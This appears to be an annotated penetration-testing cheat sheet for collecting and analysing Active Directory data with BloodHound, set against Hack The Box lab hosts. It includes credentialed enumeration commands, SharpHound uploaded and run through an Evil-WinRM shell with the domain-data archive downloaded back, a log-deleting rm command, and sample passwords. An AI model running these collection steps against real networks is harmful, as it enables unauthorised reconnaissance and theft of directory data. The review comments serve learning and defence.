BloodHound
Ingestor
Remote
bloodhound-python
# Remote collection from the operator's host against the domain.
#   -u / -p   domain account and password; the password is passed in argv, so it
#             lands in shell history and is visible in the local process list
#   -ns       name server to use for DNS lookups
#   -d        AD domain to query
#   -c All    the tool's "All" set of collection methods
#   --zip     pack the resulting JSON files into a single archive
# Detection note: this kind of collection shows up as a burst of LDAP queries plus
# connections to many member hosts from one source, which is what monitoring for
# it usually keys on.
bloodhound-python -u svc-alfresco -p s3rvice -ns 192.168.1.2 -d htb.local -c All --zip
# proxy / tunnel / pivoting / proxychains
# --dns-tcp switches DNS lookups from UDP to TCP; proxychains only relays TCP, so
# without it name resolution would bypass the proxy or fail. -q silences
# proxychains' own output.
proxychains -q bloodhound-python -u svc-alfresco -p s3rvice -ns 192.168.1.2 -d htb.local -c All --dns-tcp --zip
NetExec
# Empty NetExec's log directory first so that the *.zip moved at the end can only
# be the new collection. This deletes every earlier NetExec log for this user;
# copy them elsewhere beforehand if they are needed as a record of the work.
rm ~/.nxc/logs/*
# Collect over LDAP with NetExec's BloodHound option (credentials are again on the
# command line, with the same history/process-list exposure).
netexec ldap 192.168.1.2 -u 'svc-alfresco' -p 's3rvice' --bloodhound --collection All
# Same collection with the DNS server given explicitly; presumably an alternative
# for when the default resolver cannot resolve the domain's names.
netexec ldap 192.168.1.2 -u 'svc-alfresco' -p 's3rvice' --bloodhound --collection All --dns-server 192.168.1.2
# The page expects the resulting archive in ~/.nxc/logs; move it to the current directory.
mv ~/.nxc/logs/*.zip .
Local
SharpHound.exe
https://github.com/SpecterOps/SharpHound/releases/tag/v1.1.1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\Privesc> upload SharpHound.exe
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\Privesc> .\SharpHound.exe -c All
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\Privesc> dir
Directory: C:\Users\svc_loanmgr\Desktop\Privesc
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/26/2022 7:44 AM 11633 20220926074434_BloodHound.zip
-a---- 9/26/2022 7:42 AM 1051648 SharpHound.exe
-a---- 9/26/2022 7:44 AM 8601 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\Privesc> download 20220926074434_BloodHound.zip
SharpHound.ps1
https://github.com/SpecterOps/SharpHound/releases/tag/v1.1.1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> upload SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> Invoke-BloodHound -CollectionMethod All
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> dir
Directory: C:\Users\svc_loanmgr\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/25/2022 5:41 PM 9112 20220925174131_BloodHound.zip
-a---- 9/25/2022 5:40 PM 973325 SharpHound.ps1
-a---- 9/25/2022 5:41 PM 11122 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> download 20220925174131_BloodHound.zip
Analysis
Neo4j
# apt install -y neo4j
# Runs Neo4j in the foreground (stops when the terminal is closed).
# NOTE(review): a fresh Neo4j install starts with the default neo4j/neo4j login;
# change it at first login. The imported graph maps the domain's privilege
# relationships, so keep the database reachable from localhost only.
neo4j console
BloodHound
# apt install -y bloodhound
# Starts the BloodHound GUI, which logs in to the Neo4j instance started with
# `neo4j console`.
bloodhound
Docker
https://0ut3r.space/2024/04/22/bloodhound-ce-and-docker/
# dependencies
apt install -y docker-compose docker.io
# download the docker-compose file
# /dev/shm is RAM-backed (tmpfs): the compose file placed here is gone after a reboot.
cd /dev/shm
# NOTE(review): this URL tracks the `main` branch, so the file (and whatever image
# tags it references) can change between runs. Pin to a release tag or commit and
# read the file before bringing it up as root.
wget https://raw.githubusercontent.com/SpecterOps/bloodhound/main/examples/docker-compose/docker-compose.yml
# run
root@kali:/dev/shm ❯ docker-compose up -d
# get tmp password
# The initial admin password is written to the container log in clear text, so
# anyone who can read these logs can read it until it has been changed.
root@kali:/dev/shm ❯ docker-compose logs
# example output (tmp password):
bloodhound-1 | {"time":"2025-10-10T13:32:37.710337927Z","level":"INFO","message":"###################################################################"}
bloodhound-1 | {"time":"2025-10-10T13:32:37.710361799Z","level":"INFO","message":"# #"}
bloodhound-1 | {"time":"2025-10-10T13:32:37.710365328Z","level":"INFO","message":"# Initial Password Set To: NGRZOGWZ1RtaKyzx5S3mJqSnjxrFrPf7 #"}
bloodhound-1 | {"time":"2025-10-10T13:32:37.710367993Z","level":"INFO","message":"# #"}
bloodhound-1 | {"time":"2025-10-10T13:32:37.710370407Z","level":"INFO","message":"###################################################################"}
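# log in with the temporary password from the log output, then change it
admin:NGRZOGWZ1RtaKyzx5S3mJqSnjxrFrPf7
# new password (sample value from this walkthrough; set a unique, strong one per deployment)
admin:P@ssword12345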
# stop & delete
# NOTE(review): `docker-compose down` removes the containers and their network but
# keeps named volumes. If the compose file defines any, the imported AD data stays
# on disk until they are removed as well (`docker-compose down -v`).
root@kali:/dev/shm ❯ docker-compose down ; systemctl stop docker ; systemctl stop containerd